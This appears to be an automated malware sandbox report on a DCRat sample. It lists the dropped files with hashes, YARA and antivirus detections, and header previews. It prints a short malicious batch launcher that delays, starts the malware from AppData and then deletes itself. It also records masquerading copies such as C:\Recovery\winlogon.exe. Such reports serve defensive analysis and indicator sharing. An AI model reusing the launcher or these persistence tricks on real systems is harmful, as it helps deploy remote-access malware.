                                                                                            SHA-512:B8E93F9346D18459327D2A62A9704BDFDF1EFC1C5D50B2083CD8F312853C52F5C1E43F5A69C0B304ADDB6692BBA051A559174FB48407F069B6CE97190B1CE66C
                                                                                            Malicious:false
                                                                                            Preview:4TaiRbAEiTGFPfsc5QkdDO10hsbDU4ThFqm34EcGpHVLKOA3gTOUgm2pbkBi96tn9j9i2zh1yey63qpSrihBq9Bcy6bTD3HsXrLlPbAqvXfBy5wv5t1aZr7Ahgu5YNy5WFiLeDDPi0QSd9o2KpYTBqSquKEsrFRhjkptXlR1ql2iapgi21vsye3px1aT9Uidits3U4fjYgnZytPEnf00UjsFq96fK72VDZAr6nN7WLUS0d1DmVpddsI9AnMV89YaoRWZthIAR3dIOaOMI23yRZ2VQAqTa28Xx3niHbTENpLkOAukYANGFkJOZAJt0yjZ4GVVwqFqjzkmORHPPG5ap2RMuZJHRjNYGvqIpZxs5ggQ9gAI34du3ItCyIkXg7Z9lLgcl9jzSMfIVANNZBNXGdf7BoThzaL7HhpxAhg4Uobqmlqx4W7fuC3Hqia7pCA2BiByVZN1eTCbCyUa7fmccpNEnhHbGjOSnjoEj1ceJGBaAbF1N99JZiZWV7LySvu5FtxdJQ1GDISWowELcPOGjE3FJSsmqoMXVFVQnmr6I3GRPDri29VDhoVA0sT1iPaZ54BibyhzhR8q8lzGkJtqSI0rtUZ5T0Y2cqVUCJHDbggQppBO2MQYftHxETzGZmgq3FNSQfEbCqPvmkBDSKDGk9XtjiQsUAoz9zXjct8XIyWzeVKeRvxOiaG3sdssOVHBBZwwNcljMq8vnhPNXwaiMaQjtd18AQIwrUxEjXRzJOC2cVQKOfUc5izlJMDtlni5hLDSuLo9flZ7XXHYNquf5p1IfM4WUhNgqGVQR7aD0U7TJ1NvFpg52C91U4xhQSp7X2RQC0GPProksh9n8IQoBSnnHd6WK2wip95Qk7tOiQpLXYJw5JjHBA6EPnJi4uEX4G5smtDBZCFuncPsUKbATphoD0B7xKUy

                                                                                            C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Java\jre-1.8\bin\client\vXKtedDiKZHKptbUFqIBdHmZ.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Program Files (x86)\MSBuild\Microsoft\8de7bf56f754b7

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:Arhangel archive data
                                                                                            Category:dropped
                                                                                            Size (bytes):173
                                                                                            Entropy (8bit):5.6426082173396805
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:E/ynJdqRFvqPyTsLLBzlxW2PzBWKTHrXJ+FvmM7yITUynd:iyJdq/vqPyABzF1W0X477ygUynd
                                                                                            MD5:6ABFFF567DD16F663EE65BD823A2BAF4
                                                                                            SHA1:7848788F54016FE63C9186E4F291C6AB3E0B1A0F
                                                                                            SHA-256:1C07F6BFFDD7424EB54C60A0FAF296446A58F2228F99EF83EF9B68903CD8B9EC
                                                                                            SHA-512:E36FB0CCD0F2FDE4DA177B1C382254FED315C029B022A565D8268C87B626F5A6BCDAA6F6C5147975DA1CCABA0043DBEFD7D8054454D66B1A47E05FCC53FCC006
                                                                                            Malicious:false
                                                                                            Preview:LGis95LbwXbOuTDDPjQovsGNOrRiVL8O49P4u6ht2ZOjW6kfIOBsMvZd9VdRomFlZMTuDJSSBhwVdg0SHvaHKPCIkv4ZdPFPTmKKm0b95srp9D9deLK2M8bJKLJSO3zvcgB1VqpRUbLbiWJgvb5SEMCVLAAbqIuC35McCIHyf3ivx

                                                                                            C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Program Files\Microsoft Office 15\8de7bf56f754b7

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):273
                                                                                            Entropy (8bit):5.744573863238078
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:OyWtaS7I/hxfdPCh9nrYB43vc2Qy99gWwQh7/C:DBwI/XfdA9nTvwU9dXh7/C
                                                                                            MD5:8076A5F3A6451BB9799AE924CCB4BDA2
                                                                                            SHA1:A5E23B61D3B6BA053AA73A59C38341C1B73AC2B0
                                                                                            SHA-256:D875F78CB7C05566D5E2FF7DA4A9BAEAACC3E82F8D499CED99339A10D1FAE32F
                                                                                            SHA-512:DC0FAD5AE37DB613885C47848F8D43F75CF3BD6B59E0DF9F56637F3F8014583768D014FC8AAF71DFE7A50BDB9385F3BA75950D806323859BFDCFEB12127240A4
                                                                                            Malicious:false
                                                                                            Preview:wZLv4eve8BANULTeSqJd0iTaFzSCybiUTKJvuc6o4WqdTbl9L7MZ7yaOFvpELtqgdq4KBhuzufjd1zGoOS10OJWet5p8w1cLpJAnga7nNXpcP6XQpB0220SUTZaG2vC2CYyrycHxUNm1e3OxhZTvBjSz1qTHA1vbUwa1IpbM4ChoNazZLniccR0cF90IIAxdbKhrdXp28H19Bola045WSS9D57wIySD4OEND3I5y7qeVa1abXZROEaLIKevgkgDpD7v7ahhs8HZlyomEg

                                                                                            C:\Program Files\Microsoft Office 15\vXKtedDiKZHKptbUFqIBdHmZ.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Program Files\Windows Multimedia Platform\8de7bf56f754b7

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):181
                                                                                            Entropy (8bit):5.658566055953225
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ZeR0/nbyNo11qxDVCfP0dqLO0tsmJzAXcK/SOTgAEP5BbIafVpwVZ:ZeGXPqxOkqLuxMkS+FY5uEpgZ
                                                                                            MD5:C123A201277EEE1D41A827BB7A9AF2CC
                                                                                            SHA1:AC7EA93BCAEBAC8F8D0D466DD12425C2682D0020
                                                                                            SHA-256:8CF03A55429BDA45BECE6D836975E6271FC3E612D8A4BF0F6EF094E5EB0568CA
                                                                                            SHA-512:E555D7AD3F9F8AD38BE1323F583A33395E6AE32EA7F099A00B2C4861D5549D547E68E9298F63338F3F0CA70651B94DECEBB2F4B5FB01EDDD32A59B564931C2C8
                                                                                            Malicious:false
                                                                                            Preview:vyIU3NyFvnT7zpOYzElCiGEdAXe7PPJG4dyzgnwzP8zROilUMYVQFnmouoUfs10gdNCW1Y1MRvxjQxPbvKv043AR1JF2TQHYITxBfPdxgJ8T0CY6Y2uiG9lkMverT92BoZb79O6gq7Tv5qbzvIeagiRJrNyuuwdhQ6obla6K6N1Ip0pfUp6Lf

                                                                                            C:\Program Files\Windows Multimedia Platform\vXKtedDiKZHKptbUFqIBdHmZ.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Recovery\cc11b995f2a76d

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with very long lines (836), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):836
                                                                                            Entropy (8bit):5.901204239279335
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:0scBBSzCh8ddhB9xXaMh3w5eLSh3f8h9Rv:aBYCydzNh3w5ek3kJ
                                                                                            MD5:E1188D4A27CB40AF562FC92D00787EAE
                                                                                            SHA1:B8CA0C38CDEA476CC12B1F8179810388DC39D932
                                                                                            SHA-256:8FB8A5EFEEC36277D9DBFE6AFD02932B51846D60F3D4A4C3610291C0ECFB058D
                                                                                            SHA-512:7CC6F77F049F59E47653E1E985641FACBE2A0E6EF45AE8BF35250238C20BF22EBD827B31CBEBB470E8BAF4DEBD9D8A4D019543BDA16697AD8D98D537CD7018D7
                                                                                            Malicious:false
                                                                                            Preview:x2E2ZWZNbmzRcGdAz1jQ6BjUg1q9OvooOH7EWpIVj4798WK8DV5hbi3vTtVipZ9q8LDVIYnKtNrCEkVJrs530GMpOMumTkpJ5RAxTyzpruyN11rtXL07dFz18XH6nB0JhhHwji022QLFS8yXeBOHtspzbIy6r3Bq4oqTt4JzV8FM4uj9iubmwsZz2SUbu4L9PfLnSenk1Zwunc5rjyX7bZ3LP0bbjsFbxF7Yi5rEG1uX6oMZXn15gOh0m9YcDLAJTU7hfgIoHT0jpfOkoBE60J4jhHwigPB51kDlro40eNxNX8LHvxyBHDTKZY9YujH2R5rEbm39HOcmWrLj6oxtaAyyR3LTpgF4G55cQGpI4y32kqxsMabFwXbRG3xhakUlIhfavtSz9pymG5NkFdGOEAIsdnVXTHrTeRuCLX7dImGGjzLLpMc7dFhHZx6HX4f17fHyKKZsfnGb3BJocKsGpt0YumnXazGNGOIDsWAextc09FNXnSpNMYMOosEihBRph3Up2F6GJOT5R9ZpYPuIK2AsB4Z9Sc6wbwTGuifhWiE8FR6oTYJRQJfo2mn7q6xqRhdfqT40uMwlyCmu7uq3TofSQoNH5h1ZvXrixb89dThEX3zzA2A6Q4XmBLOBFx5NVW0bVE7gwqZ9Hb4XzXHCh4I0AEgmN63qYUsADYe55dKjeXekQ1Msp2pbN9aQiUSzxslxs3Ta2MHDujWnk5VWtLBfoRwD7OWkLUwvvr1Whvzdvmqonxqn96GlrGJbGQdozg2Zwl12D9y7WitBkIaKitlOOKDpiaPRSKnOuQ1C5xj9HIPJWH180SGF5nLmhMUnthpL

                                                                                            C:\Recovery\winlogon.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):832512
                                                                                            Entropy (8bit):5.473650729139317
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:v5Tnns8tsXmTP/4u46B2emHJJMA+ppW3Ari4VVyZC0+1cp9LhCgEwBvbvHlJNZ6:v5Tn3PB2empJMA+p3iE0nTLhLDN6
                                                                                            MD5:1F994BA149832A45EBEDCE2D36A2CA21
                                                                                            SHA1:AB913617DE27A1079E7E0B6F871C78801C4CAFF9
                                                                                            SHA-256:C0664856C2E59F8CC9E0FF378FED29E6592F429819999E1A44EADE9DBC62187E
                                                                                            SHA-512:683CEF1209118F7AD304B5118DCA5F123F1EA5BB1EE3923C9EF42DECAC8E9ACF9536E6E9B583A04EBCB9E9AD304A948612E0E64CE533F006E0CE61F40F1E7DA3
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Recovery\winlogon.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 70%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C.f................................. ........@.. ....................... ............@.....................................K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H.......X...X.......v...................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SurrogatewebSession.exe.log

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):2041
                                                                                            Entropy (8bit):5.374034001672589
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNpv:iq+wmj0qCYqGSI6oPtzHeqKktVTqZ4vb
                                                                                            MD5:553B6EF1B0572462CC8BF3E338B09385
                                                                                            SHA1:11BBCF871361CC815C2261F2A6A4230DC88D5993
                                                                                            SHA-256:58AF346985F4101CBCBB7F2E6269A3E1A5C523B8C121EC7E79F445CB03CDECCE
                                                                                            SHA-512:CA38CEABE6E4425D67B599EADF775A2626A5DCB5B2C956B88349FAB257A98678215C6A9C4E8139799C4FFD7043FF74DC71C0B7556ABB120BCB6589B2023B57CA
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vXKtedDiKZHKptbUFqIBdHmZ.exe.log

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\MSBuild\Microsoft\vXKtedDiKZHKptbUFqIBdHmZ.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\winlogon.exe.log

                                                                                            Download File
                                                                                            Process:C:\Recovery\winlogon.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1281
                                                                                            Entropy (8bit):5.370111951859942
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                                                                            MD5:12C61586CD59AA6F2A21DF30501F71BD
                                                                                            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                                                                            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                                                                            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                                                                            C:\Users\user\AppData\Local\Temp\NZDl7DWO67.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):239
                                                                                            Entropy (8bit):5.1466154973843
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1wknaZ5s2zQ0BvKOZG1wkn23fp6K4H:HTg9uYDEmrHlDf+
                                                                                            MD5:56E6342EF1E5B571492F299AAA74F702
                                                                                            SHA1:C120A9528AE8737655CE67676F13B5016BB46339
                                                                                            SHA-256:3088FDD4302BEAAF62A08F7066FD87C7959646BBB37B4E342057EE0AD139BBB3
                                                                                            SHA-512:D39DFF21027811EC4CF602E33F4145E85E956E55186A167BAC3E1DBC590891A67C1A3E840B530244A3B1CB991C532C522065BF6A9FF43D8FA903A6EF16E92313
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Roaming\msBroker\SurrogatewebSession.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\NZDl7DWO67.bat"

                                                                                            C:\Users\user\AppData\Local\Temp\RES41D7.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6fc, 10 symbols, created Fri Mar 29 15:40:51 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1972
                                                                                            Entropy (8bit):4.5642720617579435
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:HJe9sIOxfnXUDfH9FwKlNEN8luxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+qUZ:TJXSdmKoKluOulajfqXSfbNtmhlZ
                                                                                            MD5:E27348B241BEE1A27AD73793A59E777A
                                                                                            SHA1:9DF378F4DA5A601F93EEF98D3DB62E20EABDEFE8
                                                                                            SHA-256:4009D70D7AF5BCB908AF99DDF8B1DFC25ED901563CB1AE9C500BF07F7D36B6B1
                                                                                            SHA-512:CCD430935ED2D9161CDE4D1E9EED265578A310E7B89F8E61DAC4F845D607118CE3F9C3C325FD143B65F43783BFA168C797D22BA70B4D35E4C43F95AB3D4C7D65
                                                                                            Malicious:false
                                                                                            Preview:L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCD00016AF5F994D2B979CA07EFAA630F3.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES41D7.tmp.-.<....................a..Microsoft (R) CVTRES.o.=..cwd.C:\Users\user\AppData\Roaming\msBroker.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................ .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.

                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\1.bat

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\H9gMIu2HXi.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):35
                                                                                            Entropy (8bit):4.286146588249911
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:mKDDFRK58FoXMMH:h08Foc2
                                                                                            MD5:FF59D999BEB970447667695CE3273F75
